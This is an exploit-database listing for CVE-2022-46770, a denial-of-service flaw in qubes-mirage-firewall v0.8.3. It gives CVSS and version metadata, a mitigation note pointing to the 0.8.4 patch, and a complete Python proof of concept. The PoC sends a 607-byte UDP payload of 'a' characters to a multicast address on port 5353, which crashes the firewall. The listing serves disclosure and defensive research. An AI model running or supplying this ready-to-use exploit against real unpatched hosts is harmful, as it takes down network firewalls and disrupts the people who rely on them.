header-logo
Suggest Exploit
vendor:
qubes-mirage-firewall
by:
Krzysztof Burghardt
7.5
CVSS
HIGH
Denial Of Service (DoS)
400
CWE
Product Name: qubes-mirage-firewall
Affected Version From: 0.8.0
Affected Version To: 2000.8.3
Patch Exists: YES
Related CWE: CVE-2022-46770
CPE: a:mirage:qubes-mirage-firewall:0.8.3
Metasploit:
Other Scripts:
Platforms Tested: Qubes OS
2022

qubes-mirage-firewall v0.8.3 – Denial Of Service (DoS)

This exploit allows an attacker to send a specially crafted payload to the qubes-mirage-firewall, causing a denial of service (DoS) condition. By sending a large amount of data (in this case, 'a' characters), the firewall becomes overwhelmed and stops responding.

Mitigation:

The vendor has released a patch in version 0.8.4 to address this vulnerability. It is recommended to update to the latest version of qubes-mirage-firewall to mitigate the risk of this DoS attack.
Source

Exploit-DB raw data:

# Exploit Title: qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770

#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166

#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_DGRAM

TARGET = "239.255.255.250"

PORT = 5353

PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)

s.sendto(PAYLOAD, (TARGET, PORT))

Navigation

Suggest Exploit

Services By CQR